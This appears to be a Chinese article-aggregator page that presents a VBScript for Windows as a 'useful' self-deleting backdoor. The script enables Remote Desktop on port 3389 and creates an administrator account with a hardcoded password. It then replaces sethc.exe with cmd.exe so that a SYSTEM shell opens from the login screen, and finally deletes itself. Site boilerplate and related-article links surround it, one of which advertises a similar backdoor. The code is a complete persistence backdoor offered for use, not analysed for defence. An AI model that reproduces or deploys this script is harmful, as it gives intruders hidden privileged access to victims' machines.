如何使用vbs实现可自删除、开启3389创建用户粘滞键后门

2023-06-08 10:06:55 700人浏览独家记忆

摘要

这篇文章给大家分享的是有关如何使用vbs实现可自删除、开启3389创建用户粘滞键后门的内容。小编觉得挺实用的，因此分享给大家做个参考，一起跟随小编过来看看吧。on error resume next

这篇文章给大家分享的是有关如何使用vbs实现可自删除、开启3389创建用户粘滞键后门的内容。小编觉得挺实用的，因此分享给大家做个参考，一起跟随小编过来看看吧。

on error resume next const HKEY_LOCAL_MacHINE = &H80000002 strComputer = "." Set StdOut = WScript.StdOut Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_ strComputer & "\root\default:StdRegProv") strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server" strValueName = "fDenyTSConnections" dwValue = 0 oReg.SetDWordValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" strValueName = "PortNumber" dwValue = 3389 oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue on error resume next dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="wykgif":password="wykgif123456":end if:set wsnetwork=CreateObject("WSCRIPT.netWORK"):os="WinNT://"&wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os&"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os&"/"&username&",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath On Error Resume Next Dim obj, success Set obj = CreateObject("WScript.shell") success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

感谢各位的阅读！关于“如何使用vbs实现可自删除、开启3389创建用户粘滞键后门”这篇文章就分享到这里了，希望以上内容可以对大家有一定的帮助，让大家可以学到更多知识，如果觉得文章不错，可以把它分享出去让更多的人看到吧！

点击免费下载>>软考高级考试备考技巧/历年真题/备考精华资料

--结束END--

本文标题: 如何使用vbs实现可自删除、开启3389创建用户粘滞键后门

本文链接: https://www.lsjlt.com/news/253698.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341

本篇文章演示代码以及资料文档资料下载

下载Word文档到电脑，方便收藏和打印～

下载Word文档

去做题

猜你喜欢

如何使用vbs实现可自删除、开启3389创建用户粘滞键后门

这篇文章给大家分享的是有关如何使用vbs实现可自删除、开启3389创建用户粘滞键后门的内容。小编觉得挺实用的，因此分享给大家做个参考，一起跟随小编过来看看吧。on error resume next ...

99+

2023-06-08
如何实现xp、2003开3389+非net创建管理用户+Shift后门+自删除的vbs脚本

这篇文章主要介绍了如何实现xp、2003开3389+非net创建管理用户+Shift后门+自删除的vbs脚本，具有一定借鉴价值，感兴趣的朋友可以参考下，希望大家阅读完这篇文章之后大有收获，下面让小编带着大家一起了解一下。代码如下:on&nb...

99+

2023-06-08
mysql如何实现用户创建、修改、删除及授权操作

这篇文章主要介绍了mysql如何实现用户创建、修改、删除及授权操作，具有一定借鉴价值，感兴趣的朋友可以参考下，希望大家阅读完这篇文章之后大有收获，下面让小编带着大家一起了解一下。1、mysql命令进行连接如...

99+

2024-04-02
Mysql如何实现查看，创建用户、赋权、删除表用户数据库等操作

这篇文章主要介绍Mysql如何实现查看，创建用户、赋权、删除表用户数据库等操作，文中介绍的非常详细，具有一定的参考价值，感兴趣的小伙伴们一定要看完！创建用户、赋权、表空间--...

99+

2024-04-02
如何使用vbs实现自动删除超过10天的文件及文件夹

小编给大家分享一下如何使用vbs实现自动删除超过10天的文件及文件夹，相信大部分人都还不怎么了解，因此分享这篇文章给大家参考一下，希望大家阅读完这篇文章后大有收获，下面让我们一起去了解一下吧！复制代码代码如下:option explici...

99+

2023-06-08
微信公众平台开发中使用Java如何实现创建一个自定义菜单

微信公众平台开发中使用Java如何实现创建一个自定义菜单？相信很多没有经验的人对此束手无策，为此本文总结了问题出现的原因和解决方法，通过这篇文章希望你能解决这个问题。自定义菜单这个功能在我们普通的编辑模式下是可以直接在后台编辑的，但是一旦我...

99+

2023-05-31

java 自定义菜单